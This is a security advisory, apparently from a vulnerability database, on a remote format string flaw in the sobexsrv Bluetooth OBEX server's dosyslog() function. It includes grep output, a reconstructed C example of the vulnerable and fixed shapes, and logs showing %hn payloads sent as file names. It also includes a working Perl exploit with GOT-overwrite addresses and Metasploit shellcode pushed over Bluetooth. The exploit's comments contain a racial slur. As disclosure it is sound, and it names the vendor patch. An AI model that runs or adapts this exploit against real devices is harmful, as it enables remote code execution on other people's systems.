Sobexsrv dosyslog Remote Format String Handling Vulnerability
Release date: 2005-12-03
Update date: 2005-12-03
Affected systems:
Mulliner sobexsrv 1.0.0-pre3
Unaffected systems:
Mulliner sobexsrv 1.0.0-pre4
Description:
BUGTRAQ ID: 15692
sobexsrv is a flexible, secure Bluetooth OBEX server.
The dosyslog function in sobexsrv contains a format string handling vulnerability. An attacker who successfully exploits it can cause a denial of service or execute arbitrary code remotely.
For example:
1. Using the internal mode, logging via syslog(8), with the INBOX in /tmp:
sobexsrv -IS -r /tmp
2. Running chrooted with Bluetooth security mode 2:
sobexsrv -s 2 -ISR -l X -r /tmp
The examples above use the -S option, which enables syslog() logging. The syslog logging support contains a format string vulnerability: when dosyslog() is used, some user input is passed to a syslog() call without a format string.
kfinisterre@animosity:~/sobexsrv-1.0.0_pre3$ grep syslog\( . -rin
./src/obexsrv.c:58: void dosyslog(char *m1, void *m2, void *m3)
./src/obexsrv.c:71: syslog(LOG_INFO, log);
...
./src/obexsrv.c:203: dosyslog("folder listing for \"%s\"\n", path, 0);
./src/obexsrv.c:290: if (ret) dosyslog("pulling \"%s\"\n", fullpath, 0);
./src/obexsrv.c:291: else dosyslog("failed pulling \"%s\"\n", fullpath, 0);
./src/obexsrv.c:334: if (ret) dosyslog("pushing \"%s\"\n", fullpath, 0);
./src/obexsrv.c:335: else dosyslog("faild pushing \"%s\"\n", fullpath, 0);
./src/obexsrv.c:356: if (ret) dosyslog("deleting \"%s\"\n", fullpath, 0);
./src/obexsrv.c:357: else dosyslog("failed deleting \"%s\"\n", fullpath, 0);
./src/obexsrv.c:401: dosyslog("created directory \"%s\"\n", fullpath, 0);
./src/obexsrv.c:406: dosyslog("failed to create directory \"%s\"\n", fullpath, 0);
...
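To show where the defect sits and why the fix is a single argument, here is an added example (not sobexsrv's own code): a reconstruction of the dosyslog() shape implied by the grep output above, next to the fixed shape. sink() is an assumed stand-in for syslog(3) so the result can be inspected, and has_format_directive() is an assumed audit helper for reviewing OBEX names in logs.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for syslog(3): same "format, ..." contract, but writes to a buffer
 * so the effect of the format string can be inspected. */
static int sink(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
    return n;
}

/* Vulnerable shape (reconstructed from the grep output above, not the
 * project's code): the message built from the client-supplied path is then
 * handed to the logger as its FORMAT. A path containing %x or %n is
 * interpreted on that second pass (undefined behaviour: memory read/write). */
static int dosyslog_vulnerable(char *out, size_t outsz, const char *m1, const char *m2)
{
    char log[256];
    snprintf(log, sizeof log, m1, m2);      /* m1 is a constant; this part is fine */
    return sink(out, outsz, log);           /* BUG: log is attacker-influenced */
}

/* Fixed shape (assumed standard fix): the built message is only ever an
 * ARGUMENT to a constant "%s" format, so every '%' in it is emitted literally. */
static int dosyslog_fixed(char *out, size_t outsz, const char *m1, const char *m2)
{
    char log[256];
    snprintf(log, sizeof log, m1, m2);
    return sink(out, outsz, "%s", log);
}

/* Audit helper for log review: does an untrusted name carry a conversion a
 * format-string sink would act on? "%%" is an escaped percent and is ignored. */
static int has_format_directive(const char *s)
{
    for (const char *p = s; (p = strchr(p, '%')) != NULL; p++) {
        if (p[1] == '%') { p++; continue; }
        if (p[1] != '\0') return 1;
    }
    return 0;
}
```

A benign name such as "100%%" is enough to tell the two apart without undefined behaviour: the vulnerable path collapses it to "100%" on the second pass, the fixed path logs it verbatim.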
The following example, from a Windows machine using the Widcomm Bluetooth stack, creates a folder named "--AAAABBBB%19$x.%20$x" on the remote host:
kfinisterre@threat:~$ sobexsrv -ISd -r /home/kfinisterre/
security: mode = 1
REQHINT - add handler for this!
CONNECT start
CONNECT ok, result = 1
CONNECT end
REQDONE
REQHINT - add handler for this!
PUT start
PUT name:
%1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
PUT length: 201
PUT body length: 201
PUT data_type 1
internal_handler: put for
"/home/kfinisterre//%1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
length 1
PUT ok
PUT end
REQDONE
REQHINT - add handler for this!
DISCONNECT start
DISCONNECT end
uid00(kfinisterre) gid00(kfinisterre)
groups (dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterre)
What the attacker's side sees:
animosity:/home/kfinisterre/ussp-push-0.4# ./sobexsrv.pl
pushing file /tmp/shellcode
name=/tmp/shellcode, size 1
Registered transport
set user data
created new objext
Local device 00:11:B1:07:BE:A7
Remote device 00:0B:0D:63:0B:CC (1)
started a new request
reqdone
Command (00) has now finished, rsp: 20Connected!
Connection return code: 0, id: 0
Connection established
connected to server
Sending file:
%1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,
path: /tmp/shellcode, size: 201
reqdone
Command (02) has now finished, rsp: 20reqdone
Command (01) has now finished, rsp: 20Disconnect done!pushed!!
Source: Kevin Finisterre (dotslash@snosoft.com)
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=113364326902313&w=2
Test method:
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching. Use at your own risk!
#
# trifinite.group Bluetooth sobexsrv remote syslog() exploit
# code by kf_lists[at]digitalmunition[dot]com
#
# http://www.digitalmunition.com
#
# Shouts to my nigga Chung and the Donut Shop... keep fighting that SARS dude!
# Big ups to d4yj4y beeeeeeeeeeeeeotch!
#
$retloc = 0x8053418; # Due to unicode the filename is NOT usable. Must use file contents.
# R_386_JUMP_SLOT exit()
$addy = "\x5a\x19\x05\x08";
$addy2 = "\x58\x19\x05\x08";
$lo = ($retloc >> 0) & 0xffff;
$hi = ($retloc >> 16) & 0xffff;
$hi = $hi - 0x38;
$lo = (0x10000 + $lo) - $hi - 0x38;
#print "hi: $hi\n";
#print "lo: $lo\n";
$string = "./ussp-push 00:0B:0D:63:0B:CC\@1 /tmp/shellcode " . "$addy$addy2%$hi.d%27\\\$hn%$lo.d%28\\\$hn" . "\x41" x 200;
#print $string . "\n";
$sc = "\x90" x 31 . # Metasploit /usr/bin/id shellcode
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4c\x46\x4b\x50\x4a\x35".
"\x49\x39\x44\x55\x48\x46\x4a\x46\x4d\x52\x43\x36\x49\x58\x47\x4e".
"\x4a\x56\x4f\x52\x43\x57\x4a\x46\x42\x50\x4a\x56\x4f\x32\x44\x56".
"\x49\x46\x50\x56\x49\x58\x43\x4e\x44\x45\x4a\x4e\x4e\x30\x42\x30".
"\x42\x30\x42\x50\x4f\x32\x45\x47\x43\x57\x44\x47\x4f\x32\x44\x56".
"\x49\x36\x50\x46\x4f\x52\x49\x56\x46\x36\x42\x50\x47\x45\x43\x35".
"\x49\x58\x41\x4e\x4d\x4c\x42\x38\x5a";
open(F, "> /tmp/shellcode") or die "can't open file";
print F "$sc\n";
close(F);
system($string);
Recommendation:
Vendor patch:
Mulliner
--------
The vendor has released an upgrade that fixes this security issue; download it from the vendor's homepage:
http://www.mulliner.org/bluetooth/sobexsrv-1.0.0pre4.tar.gz